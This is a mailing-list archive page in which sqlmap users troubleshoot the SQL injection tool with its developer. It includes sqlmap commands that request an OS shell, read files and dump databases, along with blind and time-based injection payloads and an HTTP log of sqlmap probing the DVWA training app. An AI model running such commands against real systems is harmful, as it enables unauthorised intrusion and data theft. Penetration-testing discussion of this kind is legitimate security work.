sqlmap-users Mailing List for sqlmap (Page 80)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: ryan c. <rya...@gm...> - 2011-09-09 13:04:39
|
why does --file-read retrieve a hex stream when downloading an ascii file? |
|
From: Miroslav S. <mir...@gm...> - 2011-09-09 10:40:46
|
Hi to all. Please, anyone, send me the affected url(s) and i'll gladly fix the issue, if there is any ;) Kind regards On 9.9.2011. 11:58, "Chris Oakley" <chr...@gm...> wrote: > I've been getting that this week (latest revision); I assumed it was a WAF > or IPS that the client hadn't white listed us on, but maybe not? I tried > just about every concoction of options possible :) > > Regards > > Chris > > On 9 September 2011 10:55, Sherif El-Deeb <arc...@gm...> wrote: > >> This happens sometimes when the page consists only from a java script that >> loads another page without changing the URL. >> >> To get a better understanding of what's the cause, run wireshark, then >> browse normally to the page capturing the traffic, then trace the connection >> and check the interaction between the browser and the website. >> >> Sherif eldeeb >> On Sep 9, 2011 12:48 PM, "ryan cartner" <rya...@gm...> wrote: >> > I can access the url manually with no trouble but when I point sqlmap at >> it >> > I get: >> > >> > [CRITICAL] connection timed out to the target url or proxy, sqlmap is >> going >> > to retry the request >> > >> > No proxy is being used, and setting --random-agent doesn't fix the >> problem. >> > >> > I tried with -t but the resulting file is empty, I would expect the >> initial >> > request to be logged, maybe this means there is no request ? >> >> >> ------------------------------------------------------------------------------ >> Why Cloud-Based Security and Archiving Make Sense >> Osterman Research conducted this study that outlines how and why cloud >> computing security and archiving is rapidly being adopted across the IT >> space for its ease of implementation, lower cost, and increased >> reliability. Learn more. http://www.accelacomm.com/jaw/sfnl/114/51425301/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> |
|
From: Chris O. <chr...@gm...> - 2011-09-09 09:58:09
|
I've been getting that this week (latest revision); I assumed it was a WAF or IPS that the client hadn't white listed us on, but maybe not? I tried just about every concoction of options possible :) Regards Chris On 9 September 2011 10:55, Sherif El-Deeb <arc...@gm...> wrote: > This happens sometimes when the page consists only from a java script that > loads another page without changing the URL. > > To get a better understanding of what's the cause, run wireshark, then > browse normally to the page capturing the traffic, then trace the connection > and check the interaction between the browser and the website. > > Sherif eldeeb > On Sep 9, 2011 12:48 PM, "ryan cartner" <rya...@gm...> wrote: > > I can access the url manually with no trouble but when I point sqlmap at > it > > I get: > > > > [CRITICAL] connection timed out to the target url or proxy, sqlmap is > going > > to retry the request > > > > No proxy is being used, and setting --random-agent doesn't fix the > problem. > > > > I tried with -t but the resulting file is empty, I would expect the > initial > > request to be logged, maybe this means there is no request ? > > > ------------------------------------------------------------------------------ > Why Cloud-Based Security and Archiving Make Sense > Osterman Research conducted this study that outlines how and why cloud > computing security and archiving is rapidly being adopted across the IT > space for its ease of implementation, lower cost, and increased > reliability. Learn more. http://www.accelacomm.com/jaw/sfnl/114/51425301/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Sherif El-D. <arc...@gm...> - 2011-09-09 09:55:28
|
This happens sometimes when the page consists only from a java script that loads another page without changing the URL. To get a better understanding of what's the cause, run wireshark, then browse normally to the page capturing the traffic, then trace the connection and check the interaction between the browser and the website. Sherif eldeeb On Sep 9, 2011 12:48 PM, "ryan cartner" <rya...@gm...> wrote: > I can access the url manually with no trouble but when I point sqlmap at it > I get: > > [CRITICAL] connection timed out to the target url or proxy, sqlmap is going > to retry the request > > No proxy is being used, and setting --random-agent doesn't fix the problem. > > I tried with -t but the resulting file is empty, I would expect the initial > request to be logged, maybe this means there is no request ? |
|
From: ryan c. <rya...@gm...> - 2011-09-09 09:48:22
|
I can access the url manually with no trouble but when I point sqlmap at it I get: [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request No proxy is being used, and setting --random-agent doesn't fix the problem. I tried with -t but the resulting file is empty, I would expect the initial request to be logged, maybe this means there is no request ? |
|
From: Miroslav S. <mir...@gm...> - 2011-09-09 06:17:10
|
hi. Python has to be >=2.5. it's written inside official manual pages. kind regards 2011/9/8 anonymous anonymous <tm...@2c...>: > On the new server: > > [root@pro1917 sqlmap-dev]# ./sqlmap.py > File "./sqlmap.py", line 126 > finally: > ^ > SyntaxError: invalid syntax > > [root@pro1917 sqlmap-dev]# yum install python > Loaded plugins: fastestmirror > Loading mirror speeds from cached hostfile > * atomic: www7.atomicorp.com > * epel: ftp.uni-koeln.de > * rpmforge: ftp-stud.fht-esslingen.de > Setting up Install Process > Package python-2.4.3-44.el5.x86_64 already installed and latest version > Nothing to do > ------------------------------------------------------------------------------ > Doing More with Less: The Next Generation Virtual Desktop > What are the key obstacles that have prevented many mid-market businesses > from deploying virtual desktops? How do next-generation virtual desktops > provide companies an easier-to-deploy, easier-to-manage and more affordable > virtual desktop model.http://www.accelacomm.com/jaw/sfnl/114/51426474/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: anonymous a. <tm...@2c...> - 2011-09-08 22:01:23
|
<div><div>On the new server: </div><div> </div><div>[root@pro1917 sqlmap-dev]# ./sqlmap.py</div><div> File "./sqlmap.py", line 126</div><div> finally:</div><div> ^</div><div>SyntaxError: invalid syntax</div></div><div> </div><div><div>[root@pro1917 sqlmap-dev]# yum install python</div><div>Loaded plugins: fastestmirror</div><div>Loading mirror speeds from cached hostfile</div><div> * atomic: www7.atomicorp.com</div><div> * epel: ftp.uni-koeln.de</div><div> * rpmforge: ftp-stud.fht-esslingen.de</div><div>Setting up Install Process</div><div>Package python-2.4.3-44.el5.x86_64 already installed and latest version</div><div>Nothing to do</div></div> |
|
From: Miroslav S. <mir...@gm...> - 2011-09-08 09:02:31
|
hi mitchell have you tried putting a * into the URL where you want sqlmap to inject payloads? e.g.: ./sqlmap.py -u "http://target.com/news/press/p:1*" kind regards On Thu, Sep 8, 2011 at 10:11 AM, mitchell <mit...@tu...> wrote: > Hello guys, > Recently, during a blackbox test, my team had to test a URL that looks like: > http://target.com/news/press/p:1 > where 'p' is a dynamic parameter, and it stands for the page. > Do you know if there is a way to have sqlmap test this parameter? > Kind Regards, > -- > #!/mitchell > ------------------------------------------------------------------------------ > Doing More with Less: The Next Generation Virtual Desktop > What are the key obstacles that have prevented many mid-market businesses > from deploying virtual desktops? How do next-generation virtual desktops > provide companies an easier-to-deploy, easier-to-manage and more affordable > virtual desktop model.http://www.accelacomm.com/jaw/sfnl/114/51426474/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: mitchell <mit...@tu...> - 2011-09-08 08:40:41
|
Hello guys, Recently, during a blackbox test, my team had to test a URL that looks like: http://target.com/news/press/p:1 where 'p' is a dynamic parameter, and it stands for the page. Do you know if there is a way to have sqlmap test this parameter? Kind Regards, -- #!/mitchell |
|
From: Miroslav S. <mir...@gm...> - 2011-09-07 05:55:47
|
hi i guess it's time based technique here we are talking about. if yes, then the answer to your question is yes, network lag is it's greatest nemesis. have you tried increasing --time-sec to something like 10? kind regards 2011/9/7 root <ro...@cn...>: > hi guys > when i use sqlmap to get database data,like this > [*] "C?FCODB" > [*] "COFC?DB_YW" > [*] "COFCOVH?DB" > [*] "D?SYS" > [*] "DB?NMP" > [*] "E?FSYS" > [*] "OL?PSYS" > [*] "OTLN" > [*] "S`OTT" > [*] "SH\x7f" > [*] "SYSMAY\x11" > [*] "SYS}" > [*] "WMS`S" > [*] CTXSYS > [*] HR > [*] IX > [*] MpSYS > [*] OE > [*] ORDSYS > [*] PM > [*] SYSTEz > [*] TSMSYS > [*] XDB1 > > why this? network speed? > > 2011-09-07 > ________________________________ > thks&Best Regards > robert > ------------------------------------------------------------------------------ > Using storage to extend the benefits of virtualization and iSCSI > Virtualization increases hardware utilization and delivers a new level of > agility. Learn what those decisions are and how to modernize your storage > and backup environments for virtualization. > http://www.accelacomm.com/jaw/sfnl/114/51434361/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: root <ro...@cn...> - 2011-09-07 03:31:53
|
hi guys when i use sqlmap to get database data,like this [*] "C?FCODB" [*] "COFC?DB_YW" [*] "COFCOVH?DB" [*] "D?SYS" [*] "DB?NMP" [*] "E?FSYS" [*] "OL?PSYS" [*] "OTLN" [*] "S`OTT" [*] "SH\x7f" [*] "SYSMAY\x11" [*] "SYS}" [*] "WMS`S" [*] CTXSYS [*] HR [*] IX [*] MpSYS [*] OE [*] ORDSYS [*] PM [*] SYSTEz [*] TSMSYS [*] XDB1 why this? network speed? 2011-09-07 thks&Best Regards robert |
|
From: Miroslav S. <mir...@gm...> - 2011-09-06 08:16:16
|
p.s. --os-shell appears to work properly in our LAMP testing environment (tested for full union and partial union techniques) On Tue, Sep 6, 2011 at 10:13 AM, Miroslav Stampar <mir...@gm...> wrote: > hi Ahmed. > > from the traffic file you've sent to me it seems that php shell was > indeed uploaded in request #21 but for some reason nothing was > returned in validation request #22. > > could you please: > > 1) check what do you get in web browser with: > http://172.16.171.134:80/hackable/uploads/tmpupgiv.php > > 2) check inside the virtual machine itself what's the content of that > file there (./hackable/uploads/tmpupgiv.php) > > Kind regards > > On Mon, Sep 5, 2011 at 12:02 PM, Ahmed Shawky <ah...@is...> wrote: >> >> while testing sqlmap against DVWA I noticed it doesn't work like expected >> while using --os-shell >> ./sqlmap.py -u >> "http://172.16.171.134/vulnerabilities/sqli/?id=test&Submit=Submit" -p id >> --dbms mysql --technique US --union-col 2 --suffix "#" --prefix "'" --cookie >> "PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low" --os-shell -v3 -t >> /home/lnxg33k/Desktop/dvwa.txt --flush-session >> >> -- >> >> Ahmed Shawky El-Antry >> lnxg33k owner "http://lnxg33k.wordpress.com" >> Isecur1ty team member"http://www.isecur1ty.org" >> Twitter @lnxg33k >> >> ------------------------------------------------------------------------------ >> Special Offer -- Download ArcSight Logger for FREE! >> Finally, a world-class log management solution at an even better >> price-free! And you'll get a free "Love Thy Logs" t-shirt when you >> download Logger. Secure your free ArcSight Logger TODAY! >> http://p.sf.net/sfu/arcsisghtdev2dev >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2011-09-06 08:13:36
|
hi Ahmed. from the traffic file you've sent to me it seems that php shell was indeed uploaded in request #21 but for some reason nothing was returned in validation request #22. could you please: 1) check what do you get in web browser with: http://172.16.171.134:80/hackable/uploads/tmpupgiv.php 2) check inside the virtual machine itself what's the content of that file there (./hackable/uploads/tmpupgiv.php) Kind regards On Mon, Sep 5, 2011 at 12:02 PM, Ahmed Shawky <ah...@is...> wrote: > > while testing sqlmap against DVWA I noticed it doesn't work like expected > while using --os-shell > ./sqlmap.py -u > "http://172.16.171.134/vulnerabilities/sqli/?id=test&Submit=Submit" -p id > --dbms mysql --technique US --union-col 2 --suffix "#" --prefix "'" --cookie > "PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low" --os-shell -v3 -t > /home/lnxg33k/Desktop/dvwa.txt --flush-session > > -- > > Ahmed Shawky El-Antry > lnxg33k owner "http://lnxg33k.wordpress.com" > Isecur1ty team member"http://www.isecur1ty.org" > Twitter @lnxg33k > > ------------------------------------------------------------------------------ > Special Offer -- Download ArcSight Logger for FREE! > Finally, a world-class log management solution at an even better > price-free! And you'll get a free "Love Thy Logs" t-shirt when you > download Logger. Secure your free ArcSight Logger TODAY! > http://p.sf.net/sfu/arcsisghtdev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2011-09-06 06:04:53
|
hi Ryan. that dynamicity shouldn't be a problem for the testing itself. it just says that it seems like the page doesn't change on different values for that parameter. you can try switches --text-only or --string in your case (if you are hunting for a boolean injection - otherwise reply back with more info and we'll see how we can help you). kind regards On Mon, Sep 5, 2011 at 9:00 PM, ryan cartner <rya...@gm...> wrote: > When I attempt to run sqlmap against a application that I know from manual > testing is vulnerable, it claims the vulnerable parameter is not dynamic. > Any idea what can be causing this? > ------------------------------------------------------------------------------ > Special Offer -- Download ArcSight Logger for FREE! > Finally, a world-class log management solution at an even better > price-free! And you'll get a free "Love Thy Logs" t-shirt when you > download Logger. Secure your free ArcSight Logger TODAY! > http://p.sf.net/sfu/arcsisghtdev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2011-09-06 05:58:53
|
hi Max. -t debug.log will save the inbound/outbound HTTP traffic between the target and sqlmap. as you are dealing with boolean based injection there for sure won't be any "readable" data inside as every request represents only one bit of information you are looking for (current-db) Kind regards On Tue, Sep 6, 2011 at 7:49 AM, Max Pain <pai...@ya...> wrote: > Hello, > I'm trying to manually reproduce a blind sql injection that sqlmap ( 0.9 ) > found. > here is how I ran it. > ./sqlmap.py -v 6 --level 5 -u "http://site?id=9" --current-db -t debug.log > debug.log does not show any sign of a current-db ( that is in > output/site/log ) > What am I missing? > sqlmap identified the following injection points with a total of 403 HTTP(s) > requests: > > --- > > > log shows: > Place: GET > > > Parameter: fid > > > Type: boolean-based blind > > > Title: AND boolean-based blind - WHERE or HAVING clause > > > Payload: id=9' AND 8437=8437 AND 'oCOc'='oCOc > > > > > > Type: AND/OR time-based blind > > > Title: MySQL > 5.0.11 AND time-based blind > > > Payload: id=9' AND SLEEP(5) AND 'BKLq'='BKLq > --- > current database: 'dbname' > ------------------------------------------------------------------------------ > Special Offer -- Download ArcSight Logger for FREE! > Finally, a world-class log management solution at an even better > price-free! And you'll get a free "Love Thy Logs" t-shirt when you > download Logger. Secure your free ArcSight Logger TODAY! > http://p.sf.net/sfu/arcsisghtdev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Max P. <pai...@ya...> - 2011-09-06 05:49:45
|
Hello, I'm trying to manually reproduce a blind sql injection that sqlmap ( 0.9 ) found. here is how I ran it. ./sqlmap.py -v 6 --level 5 -u "http://site?id=9" --current-db -t debug.log debug.log does not show any sign of a current-db ( that is in output/site/log ) What am I missing? sqlmap identified the following injection points with a total of 403 HTTP(s) requests: --- log shows: Place: GET Parameter: fid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=9' AND 8437=8437 AND 'oCOc'='oCOc Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=9' AND SLEEP(5) AND 'BKLq'='BKLq ---current database: 'dbname' |
|
From: ryan c. <rya...@gm...> - 2011-09-05 19:00:38
|
When I attempt to run sqlmap against a application that I know from manual testing is vulnerable, it claims the vulnerable parameter is not dynamic. Any idea what can be causing this? |
|
From: Ahmed S. <ah...@is...> - 2011-09-05 10:29:33
|
HTTP request [#1]: GET /vulnerabilities/sqli/?id=test&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#1] (200 OK): Content-length: 4333 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:53 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/securityreviews/5DP0N1P76E.html</a></li> <li><a href="http://hiderefer.com/?http://en.wikipedia.org/wiki/SQL_injection" target="_blank">http://en.wikipedia.org/wiki/SQL_injection</a></li> <li><a href="http://hiderefer.com/?http://www.unixwiz.net/techtips/sql-injection.html" target="_blank">http://www.unixwiz.net/techtips/sql-injection.html</a></li> </ul> </div> <br /> <br /> </div> <div class="clear"> </div> <div id="system_info"> <input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=sqli&security=low' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=sqli&security=low' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> low<br /><b>PHPIDS:</b> disabled</div> </div> <div id="footer"> <p>Damn Vulnerable Web Application (DVWA) v1.0.7</p> </div> </div> </body> </html> ############################################################################ HTTP request [#2]: GET /vulnerabilities/sqli/?id=test&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#2] (200 OK): Content-length: 4333 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:54 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/securityreviews/5DP0N1P76E.html</a></li> <li><a href="http://hiderefer.com/?http://en.wikipedia.org/wiki/SQL_injection" target="_blank">http://en.wikipedia.org/wiki/SQL_injection</a></li> <li><a href="http://hiderefer.com/?http://www.unixwiz.net/techtips/sql-injection.html" target="_blank">http://www.unixwiz.net/techtips/sql-injection.html</a></li> </ul> </div> <br /> <br /> </div> <div class="clear"> </div> <div id="system_info"> <input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=sqli&security=low' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=sqli&security=low' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> low<br /><b>PHPIDS:</b> disabled</div> </div> <div id="footer"> <p>Damn Vulnerable Web Application (DVWA) v1.0.7</p> </div> </div> </body> </html> ############################################################################ HTTP request [#3]: GET /vulnerabilities/sqli/?id=test%27%29%28%29%29%22%29%22%22%29%22%23&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#3] (200 OK): Content-length: 169 X-powered-by: PHP/5.3.1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test%27%29%28%29%29%22%29%22%22%29%22%23&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Date: Fri, 02 Sep 2011 00:47:54 GMT Content-type: text/html <pre>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')())")"")"#'' at line 1</pre> ############################################################################ HTTP request [#4]: GET /vulnerabilities/sqli/?id=test&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#4] (200 OK): Content-length: 4333 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: 